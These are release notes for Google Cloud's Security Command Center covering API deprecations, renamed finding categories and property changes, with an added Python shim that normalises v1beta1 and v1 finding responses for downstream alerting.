Managed Web Security Scans are now available to all Security Command Center Premium users. Learn more about managed scans in our Overview of Web Security Scanner.

gcloud integration with new, simplified Beta APIs (Alpha)

  • The gcloud command line interface can now access configuration functionality through new Beta APIs. The Beta APIs provide stable, programmatic interaction equivalent in functionality to the Security Command Center interface. Learn to use gcloud to manage Security Command Center settings.

August 24, 2020

Audit logs are now available in Security Command Center as part of Cloud Audit Logs. Learn more about Security Command Center audit logging.

July 27, 2020

Security Command Center v1beta1 API will be disabled on Jan. 31, 2021. All users will be required to migrate to Security Command Center v1 API, which is now in general availability.

  • Update to Google-provided v1 API client libraries.
  • Move your client libraries and HTTP/grpc calls to v1 by following instructions in the reference documentation for service endpoints and SDK configuration.
  • If you call this service using your own libraries, follow the guidance in our Security Command Center API Overview when making API requests.
  • To use ListFindings calls in the v1 API, update your response handling to respond to an extra layer of object nesting, as shown below:
    • v1beta1: response.getFindings().forEach( x -> ....)
    • v1: response.getListFindingsResults().forEach(x -> { x.getFinding(); .... })

Additional changes to the v1 API are listed below. Learn more about Using the Security Command Center API.

The SeverityLevel finding source property for all Security Health Analytics findings will be removed and replaced with a field named Severity, which retains the same values.

  • Impact: Finding notification filters, post-processing, and alerting based on the SeverityLevel finding source property will no longer be possible.
  • Recommendation: Replace the SeverityLevel finding source property with the Severity finding attribute property to retain existing functionality.

The nodePools finding source property will be removed from the OVER_PRIVILEGED_SCOPES findings and replaced with a source property named VulnerableNodePools.

  • Impact: Finding notification filters, post-processing and alerting based on this finding source property may fail.
  • Recommendation: Modify workflows as necessary to utilize the new VulnerableNodePools source property.

The finding category of 2SV_NOT_ENFORCED is being renamed MFA_NOT_ENFORCED.

  • Impact: Case-sensitive finding notification filters, post-processing, and alerting based on the previous finding category name may fail.
  • Recommendation: Update any post-processing to use the new category name.

The ExceptionInstructions source property will be removed from all Security Health Analytics findings.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property may fail.
  • In progress: A new property that will indicate the current state of findings is being developed.

The ProjectId source property from all Security Health Analytics findings will be removed.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property may fail.
  • Recommendation: Update workflows to utilize the project id in the resource.project_display_name field of a ListFindingsResult.

The AssetSettings finding source property from PUBLIC_SQL_INSTANCE, SQL_PUBLIC_IP, SSL_NOT_ENFORCED, AUTO_BACKUP_DISABLED, SQL_NO_ROOT_PASSWORD, SQL_WEAK_ROOT_PASSWORD finding types will be removed, as it contains data duplicated from the asset entity.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will fail.
  • Recommendation: Replacing the AssetSettings finding source property with the Settings resource property from the asset underlying the finding will retain existing functionality.

The Allowed finding source property from OPEN_FIREWALL findings will be replaced with a new field named ExternallyAccessibleProtocolsAndPorts, which will contain a subset of the values from the Allowed property.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will fail.
  • Recommendation: Modify your workflows as necessary to utilize the new ExternallyAccessibleProtocolsAndPorts source property.

The SourceRanges finding source property from OPEN_FIREWALL findings will be replaced with a new source property named ExternalSourceRanges, which will contain a subset of the values from the SourceRanges property.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will fail.
  • Recommendation: Modify your workflows as necessary to utilize the new ExternalSourceRanges source property.

As of Jan. 31, 2021, the UpdateFinding API will no longer support storing string properties that are longer than 7,000 characters.

  • Impact: Calls to UpdateFinding that seek to store string properties longer than 7,000 characters will be rejected with an invalid argument error.
  • Recommendation: Consider storing string properties longer than 7,000 characters as JSON structs or JSON lists. Learn more about writing findings.

As of Sept. 1, 2020, the ListFindings API will no longer support searching on finding properties that are longer than 7,000 characters.

  • Impact: Searches on strings that are longer than 7,000 characters will not return expected results. For example, if a partial string match filter has a match at the 7,005th character on a property in a finding, that finding will not be returned because that match is past the 7,000-character threshold. An exception will not be returned.
  • Recommendation: Customers can remove filter restrictions (e.g. x : "some-value") that are supposed to match very long properties. The results can then be filtered locally to remove findings whose strings do not match designated criteria. Learn more about filtering findings.

The OffendingIamRoles source property in extensions of IAM Scanner Configurations will use structured data instead of a JSON-formatted string.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will need to be updated to take advantage of the new data type on findings of the following categories: ADMIN_SERVICE_ACCOUNT, NON_ORG_IAM_MEMBER, PRIMITIVE_ROLES_USED, OVER_PRIVILEGED_SERVICE_ACCOUNT_USER, REDIS_ROLE_USED_ON_ORG, SERVICE_ACCOUNT_ROLE_SEPARATION, KMS_ROLE_SEPARATION.
  • Recommendation: Update workflows to utilize the new data type.

The QualifiedLogMetricNames source property in specific Monitoring findings from Security Health Analytics will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings of the following categories: AUDIT_CONFIG_NOT_MONITORED, BUCKET_IAM_NOT_MONITORED, CUSTOM_ROLE_NOT_MONITORED, FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, OWNER_NOT_MONITORED, ROUTE_NOT_MONITORED, SQL_INSTANCE_NOT_MONITORED.
  • Recommendation: Update workflows to utilize the new data type.

The AlertPolicyFailureReasons source property in specific Monitoring findings from Security Health Analytics will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings of the following categories: AUDIT_CONFIG_NOT_MONITORED, BUCKET_IAM_NOT_MONITORED, CUSTOM_ROLE_NOT_MONITORED, FIREWALL_NOT_MONITORED, NETWORK_NOT_MONITORED, OWNER_NOT_MONITORED, ROUTE_NOT_MONITORED, SQL_INSTANCE_NOT_MONITORED.
  • Recommendation: Update workflows to utilize the new data type.

The CompatibleFeatures source property in WEAK_SSL_POLICY findings will use a list instead of a character-separated string value.

  • Impact: Finding notification filters, post-processing, and alerting based on the finding source property will need to be updated to take advantage of the new data type for findings.
  • Recommendation: Update workflows to utilize the new data type.
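As an added example, not part of these release notes or of any Google client library, the following Python shim shows how a finding post-processing pipeline can absorb the v1 changes listed above in one place: the extra ListFindings nesting, SeverityLevel moving to the Severity field, the 2SV_NOT_ENFORCED rename, OffendingIamRoles changing from a JSON string to structured data, the character-separated values becoming lists, and the local-filtering workaround for properties longer than 7,000 characters. It also groups findings by the Severity field, as described in the February 05, 2021 note. The sample payloads are constructed; the REST field names findings (v1beta1) and listFindingsResults (v1) for the two response shapes, the comma separator for the legacy character-separated values, and the property values used in the samples are assumptions.

```python
"""Constructed migration shim for Security Command Center finding post-processing.

Not Google code. Normalises findings that may arrive in either the v1beta1
or the v1 shape so that downstream filters and alerting keep working.
Assumptions: the REST envelope uses "findings" (v1beta1) or
"listFindingsResults" (v1); legacy character-separated values use a comma.
"""
import json
from collections import defaultdict

# Category renamed in the v1 API.
RENAMED_CATEGORIES = {"2SV_NOT_ENFORCED": "MFA_NOT_ENFORCED"}

# Source properties that changed from a character-separated string to a list.
LIST_PROPERTIES = ("QualifiedLogMetricNames", "AlertPolicyFailureReasons", "CompatibleFeatures")
LEGACY_SEPARATOR = ","  # assumption: comma-separated legacy values

# ListFindings no longer searches properties longer than this many characters.
MAX_SEARCHABLE_LEN = 7000


def iter_findings(response):
    """Yield finding dicts from either response shape (extra nesting in v1)."""
    if "listFindingsResults" in response:
        for result in response["listFindingsResults"]:
            yield result["finding"]
    else:
        for finding in response.get("findings", []):
            yield finding


def normalize(finding):
    """Return a deep copy of the finding rewritten into the v1 shape."""
    out = json.loads(json.dumps(finding))
    props = out.setdefault("sourceProperties", {})

    out["category"] = RENAMED_CATEGORIES.get(out.get("category"), out.get("category"))

    # SeverityLevel source property -> top-level severity field, same values.
    if "severity" not in out and "SeverityLevel" in props:
        out["severity"] = props.pop("SeverityLevel")

    # OffendingIamRoles: JSON-formatted string -> structured data.
    roles = props.get("OffendingIamRoles")
    if isinstance(roles, str):
        props["OffendingIamRoles"] = json.loads(roles)

    # Character-separated string -> list.
    for name in LIST_PROPERTIES:
        value = props.get(name)
        if isinstance(value, str):
            props[name] = [v.strip() for v in value.split(LEGACY_SEPARATOR) if v.strip()]
    return out


def process(response):
    """Normalise every finding in a ListFindings response of either version."""
    return [normalize(f) for f in iter_findings(response)]


def group_by_severity(findings):
    """Count normalised findings per severity value."""
    counts = defaultdict(int)
    for f in findings:
        counts[f.get("severity", "UNSPECIFIED")] += 1
    return dict(counts)


def search_locally(findings, prop, needle):
    """Partial-string match done client-side, which the server-side filter
    would miss once the property exceeds MAX_SEARCHABLE_LEN characters."""
    return [f["name"] for f in findings
            if needle in str(f.get("sourceProperties", {}).get(prop, ""))]


# Constructed sample payloads (not real findings).
LEGACY_RESPONSE = {
    "findings": [
        {"name": "organizations/123/sources/456/findings/a",
         "category": "2SV_NOT_ENFORCED",
         "sourceProperties": {"SeverityLevel": "HIGH"}},
        {"name": "organizations/123/sources/456/findings/b",
         "category": "OWNER_NOT_MONITORED",
         "sourceProperties": {"SeverityLevel": "LOW",
                              "QualifiedLogMetricNames": "projects/p/metrics/m1, projects/p/metrics/m2"}},
        {"name": "organizations/123/sources/456/findings/c",
         "category": "PRIMITIVE_ROLES_USED",
         "sourceProperties": {"SeverityLevel": "HIGH",
                              "OffendingIamRoles": '{"roles/owner": ["user:alice@example.com"]}'}},
    ]
}
V1_RESPONSE = {
    "listFindingsResults": [
        {"finding": {"name": "organizations/123/sources/456/findings/d",
                     "category": "MFA_NOT_ENFORCED",
                     "severity": "HIGH",
                     # A property longer than the server-side search limit.
                     "sourceProperties": {"Note": "x" * (MAX_SEARCHABLE_LEN + 10) + "needle"}},
         "stateChange": "UNUSED"},
    ]
}

if __name__ == "__main__":
    all_findings = process(LEGACY_RESPONSE) + process(V1_RESPONSE)
    print(group_by_severity(all_findings))
    print(search_locally(all_findings, "Note", "needle"))
```

Running normalize over findings that are already in the v1 shape is a no-op, so the same pipeline can consume v1beta1 and v1 responses side by side while the migration is in progress.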

May 12, 2020

Security Command Center Premium and Standard tiers are now available.

The Security Command Center Premium tier includes:

  • Security Health Analytics
  • Web Security Scanner managed scans
  • Event Threat Detection
  • Container Threat Detection

Learn more about the Security Command Center Premium tier.

The Event Threat Detection API will be deprecated in the coming months. Similar functionality is available in the Security Command Center API settings feature.

Container Threat Detection currently supports the following Kubernetes Engine versions on the Regular and Rapid channels:

  • >= 1.15.9-gke.12
  • >= 1.16.5-gke.2
  • >= 1.17

In a future update, Container Threat Detection will support version 1.14 and the Stable channel.

April 10, 2020

Security Health Analytics is now in general availability.

March 23, 2020

The Notifications API is now in general availability. Get started with the notifications API.

The eventType field was removed from organizations.notificationConfigs.create in the v1 API. Learn more about creating a NotificationConfig.

February 14, 2020

Security Command Center roles inherit Web Security Scanner roles as follows:

  • The securitycenter.adminViewer role inherits the permissions of the cloudsecurityscanner.viewer role.
  • The securitycenter.adminEditor role inherits the permissions of the cloudsecurityscanner.editor role.

For information about how to view all of the permissions that are associated with a role, see the IAM documentation about Getting the role metadata.

February 13, 2020

The notifications API is now in beta:

  • Send new findings and updated findings notifications to a Pub/Sub topic.
  • Filter notifications by provider source, finding type, category or any other finding fields, properties or security marks.

Get started with the notifications API.

Security Command Center tools will become obsolete in future Security Command Center releases, when their functionalities are added as built-in features. Support is offered on a best-effort basis only for all Security Command Center tools.

November 11, 2019

Cloud SCC now supports full JSON with arrays and JSON objects as potential property types. This includes support for sorting on JSON object sub-fields, and filtering on:

  • Array elements
  • Full JSON objects with partial string match
  • JSON object sub-fields

Learn more about Filtering and sorting findings.

October 14, 2019

Security Health Analytics is now in beta and can now be enabled in the Sources Management page of Cloud SCC.

A new Vulnerabilities tab in Cloud SCC displays a dashboard that summarizes Security Health Analytics findings. This dashboard includes information about CIS benchmarks and recommended remediations.

Security Health Analytics no longer requires separate service account setup or permissions. Instead, it uses the Cloud SCC service account that's created for you during signup.

August 20, 2019

The following Security Health Analytics finding type names have changed:

  • LOGGING_DISABLED is now CLUSTER_LOGGING_DISABLED
  • MONITORING_DISABLED is now CLUSTER_MONITORING_DISABLED
  • NO_ROOT_PASSWORD is now SQL_NO_ROOT_PASSWORD
  • WEAK_ROOT_PASSWORD is now SQL_WEAK_ROOT_PASSWORD

August 05, 2019

API updated to v1.

findingType string XSS_CALLBACK changed to XSS.

May 10, 2019

Using VPC Service Controls currently blocks Cloud SCC asset discovery inside VPC Service Controls perimeters for the following asset types:

  • Compute Engine
    • Addresses
    • Routes
    • VPN Tunnels
  • Cloud Storage Buckets
  • GKE Clusters

This is expected to be fixed in a future release.

For information about troubleshooting access issues, see VPC Service Controls Troubleshooting. To work around the access to these assets, see Granting access from the internet with access levels.

April 10, 2019

Cloud SCC is now in general availability (GA). These release notes include updated items from beta and new items for GA.

ListAssetResult has changed.

GroupFindingsResponse now includes totalSize.

gcloud command-line tool support for Cloud SCC is now available.

There are now client libraries available for C#, Go, Java, Node.JS, PHP, Python, and Ruby.

Previously only active state findings were shown in the UI. You can now also choose to show inactive state findings.

ListFindings and GroupFindings now support comparison between two points in time. For more information, see the compareDuration parameter.

Assets now include IAM information for organizations, projects, Compute Engine, Cloud Storage, and others where applicable. IAM Policy information can be searched, filtered, and joined with all other Asset information and Security Marks.

Native integration with Security Health Analytics for native managed vulnerability scanning.

Native integration with Event Threat Detection for log-based threat detection.

Native integration with Phishing Protection.

The Cloud SCC dashboard now enables you to select whether just active state findings are displayed or both active and inactive.

The Cloud SCC dashboard now enables you to set active or inactive state for each finding.

The Cloud SCC dashboard now enables you to perform a time-diff query for a fixed set of time periods.

You can now export Cloud SCC data as filtered Asset or Findings data to the Cloud Storage bucket and project you select.

Hello World example app is expanded to include Cloud Functions functions for: removing bucket ACLs, deleting firewall rules, and creating a VM snapshot.

New example apps are available for:

  • Integrations with Access Transparency Logs, Audit Logging, and Binary Authorization.
  • Connecting to Splunk.

For more information, see Installing Cloud SCC tools.

Additional security partner integrations are available through [Marketplace](https://console.cloud.google.com/marketplace/details/google-cloud-platform/cloud-security-command-center).

Sorting on Asset ID column on the asset page doesn't work as expected.

Sorting on the following findings page columns doesn't work as expected:

  • eventTime
  • source property
  • security mark
  • id
  • externalUri

Sorting isn't supported for source properties and security marks on the findings changed page.

After you've created a new asset, the new asset won't appear in Cloud SCC until it's re-scanned. To see current asset state before the daily re-scan, trigger an on-demand re-scan and then wait at least 5 minutes to see the new asset appear in Cloud SCC.

After you've made an IAM policy change on an asset, the updated policy won't appear in Cloud SCC until it's re-scanned. To see current IAM policy before the daily re-scan, trigger an on-demand re-scan and then wait at least 10 minutes to see the updated IAM policies in Cloud SCC.

Code examples are still in progress for C#, Node.js, PHP, and Ruby.

March 26, 2019

API updated to v1beta.

findingType field changed to string value

The findingType field has changed from an enum to a string in the Beta release of the Web Security Scanner API. You can find details in the Scan Result Details topic.

Web Security Scanner does not yet support applications protected by Cloud Identity-Aware Proxy (Cloud IAP).